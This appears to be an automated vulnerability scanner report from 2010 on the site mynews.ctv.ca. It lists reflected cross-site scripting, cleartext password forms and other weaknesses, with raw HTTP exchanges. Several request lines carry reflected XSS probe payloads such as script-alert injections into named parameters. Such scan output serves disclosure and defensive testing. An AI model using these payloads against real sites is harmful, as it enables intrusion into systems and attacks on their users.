>
Report generated by XSS.CX at Sat Nov 20 14:25:06 CST 2010.1. Cross-site scripting (reflected)
1.1. http://mynews.ctv.ca/action/login [REST URL parameter 2]
1.2. http://mynews.ctv.ca/action/reglite [REST URL parameter 2]
1.3. http://mynews.ctv.ca/mediaAll [siteT parameter]
1.4. http://mynews.ctv.ca/services/json [method parameter]
1.5. http://mynews.ctv.ca/services/json [requests[0][methodName] parameter]
1.6. http://mynews.ctv.ca/upload [siteT parameter]
2. Cleartext submission of password
2.1. http://mynews.ctv.ca/login
2.2. http://mynews.ctv.ca/login
2.3. http://mynews.ctv.ca/upload
2.4. http://mynews.ctv.ca/upload
3. Password field with autocomplete enabled
3.1. http://mynews.ctv.ca/login
3.2. http://mynews.ctv.ca/login
3.3. http://mynews.ctv.ca/upload
3.4. http://mynews.ctv.ca/upload
4. Cross-domain Referer leakage
4.1. http://mynews.ctv.ca//servlet/HTMLTemplate/
4.2. http://mynews.ctv.ca/login
4.3. http://mynews.ctv.ca/mediaAll
4.4. http://mynews.ctv.ca/services/cssloader
4.5. http://mynews.ctv.ca/upload
4.6. http://mynews.ctv.ca/upload
5. Cross-domain script include
5.1. http://mynews.ctv.ca//servlet/HTMLTemplate/
5.2. http://mynews.ctv.ca/login
5.3. http://mynews.ctv.ca/mediaAll
5.4. http://mynews.ctv.ca/upload
5.5. http://mynews.ctv.ca/upload
6. Cookie without HttpOnly flag set
6.1. http://mynews.ctv.ca//servlet/HTMLTemplate/
6.2. http://mynews.ctv.ca/upload
7.1. http://mynews.ctv.ca/login
7.2. http://mynews.ctv.ca/mediaAll
7.3. http://mynews.ctv.ca/services/jslibrary
7.4. http://mynews.ctv.ca/services/jslibrary/1.1
7.5. http://mynews.ctv.ca/upload
8. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /action/login |
GET /action/login8b11d--><img%20src%3da Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 500 Internal Server Error Date: Sat, 20 Nov 2010 04:54:55 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 1824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... <!-- exception 'FileMobile_App_Exception Stack trace: #0 /home/filemobile/current ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /action/reglite |
GET /action/reglitedac05--><img%20src%3da Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 500 Internal Server Error Date: Sat, 20 Nov 2010 04:57:10 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 1826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... <!-- exception 'FileMobile_App_Exception Stack trace: #0 /home/filemobile/current ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /mediaAll |
GET /mediaAll?siteT=6c29a--><script>alert(1)< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 04:57:16 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 2175 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... <!-- exception 'FileMobile_Templates Stack trace: #0 /home/filemobile/current ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /services/json |
GET /services/json?requests[0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us x-prototype-version: 1.6.0.2 Referer: http://mynews.ctv.ca x-requested-with: XMLHttpRequest Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:56:04 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: application/json X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 250 {"status":false,"result": |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /services/json |
GET /services/json?requests[0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-us x-prototype-version: 1.6.0.2 Referer: http://mynews.ctv.ca x-requested-with: XMLHttpRequest Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:55:53 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: application/json X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 139 {"status":true,"result":[ |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=ad850--><script>alert(1)< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 04:55:46 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 2173 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... <!-- exception 'FileMobile_Templates Stack trace: #0 /home/filemobile/current ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form action="/action/reglite" id="2adb3b3e9e" onsubmit="return validator.submit(this);" method="post" > <input type="hidden" style="display:none" name="fm_token" value="53c7b5b227a1e ...[SNIP]... <div style="margin-left: 10px; margin-top: 10px"><input type="password" class="fmTextInput fmPassword fmPasswordField required" id="fmSignUpPassword" name="password" /></div> ...[SNIP]... <div style="margin-left: 10px"><input type="password" class="fmTextInput fmPasswordConfirm fmPasswordCheckField" id="fmSignUpPassword2" name="password2" /></div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form onsubmit="return loginValidator.submit ( this );" action="/action/login" method="post"> <fieldset class="fmForm"> ...[SNIP]... <div style="margin-top: 10px; margin-left: 10px"><input type="password" class="fmPasswordField required" name="password" id="password"></div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form onsubmit="return loginValidator.submit ( this );" action="/action/login" method="post"> <fieldset class="fmForm"> ...[SNIP]... <div style="margin-top: 10px; margin-left: 10px"><input type="password" class="fmPasswordField required" name="password" id="password"></div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form action="/action/reglite" id="c477a68654" onsubmit="return validator.submit(this);" method="post" > <input type="hidden" style="display:none" name="fm_token" value="53c7b5b227a1e ...[SNIP]... <div style="margin-left: 10px; margin-top: 10px"><input type="password" class="fmTextInput fmPassword fmPasswordField required" id="fmSignUpPassword" name="password" /></div> ...[SNIP]... <div style="margin-left: 10px"><input type="password" class="fmTextInput fmPasswordConfirm fmPasswordCheckField" id="fmSignUpPassword2" name="password2" /></div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form onsubmit="return loginValidator.submit ( this );" action="/action/login" method="post"> <fieldset class="fmForm"> ...[SNIP]... <div style="margin-top: 10px; margin-left: 10px"><input type="password" class="fmPasswordField required" name="password" id="password"></div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form action="/action/reglite" id="2adb3b3e9e" onsubmit="return validator.submit(this);" method="post" > <input type="hidden" style="display:none" name="fm_token" value="53c7b5b227a1e ...[SNIP]... <div style="margin-left: 10px; margin-top: 10px"><input type="password" class="fmTextInput fmPassword fmPasswordField required" id="fmSignUpPassword" name="password" /></div> ...[SNIP]... <div style="margin-left: 10px"><input type="password" class="fmTextInput fmPasswordConfirm fmPasswordCheckField" id="fmSignUpPassword2" name="password2" /></div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form action="/action/reglite" id="c477a68654" onsubmit="return validator.submit(this);" method="post" > <input type="hidden" style="display:none" name="fm_token" value="53c7b5b227a1e ...[SNIP]... <div style="margin-left: 10px; margin-top: 10px"><input type="password" class="fmTextInput fmPassword fmPasswordField required" id="fmSignUpPassword" name="password" /></div> ...[SNIP]... <div style="margin-left: 10px"><input type="password" class="fmTextInput fmPasswordConfirm fmPasswordCheckField" id="fmSignUpPassword2" name="password2" /></div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <form onsubmit="return loginValidator.submit ( this );" action="/action/login" method="post"> <fieldset class="fmForm"> ...[SNIP]... <div style="margin-top: 10px; margin-left: 10px"><input type="password" class="fmPasswordField required" name="password" id="password"></div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | //servlet/HTMLTemplate/ |
GET //servlet/HTMLTemplate/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: mynews.ctv.ca Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:59:41 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 9414 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA <link rel="shortcut icon" href="http://assets <script type="text/javascript"> ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </style> <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... <div id="FilemobileGenuin <a href="http://www <img src="http://assets </a> ...[SNIP]... </style> <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA <link rel="shortcut icon" href="http://assets <script type="text/javascript"> ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </style> <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... </a> <a href="http://www.newsstar <a href="http://www ...[SNIP]... <br/> <img src="http://assets </td> ...[SNIP]... <a href="/upload?siteT="> <img src="http://assets ...[SNIP]... <td id="mainTableRightCo <iframe src="http://www.ctv.ca ...[SNIP]... <div style="padding-left:5px; padding-top:6px; padding-right:4px"> <img src="http://assets ...[SNIP]... <td><img src="http://assets 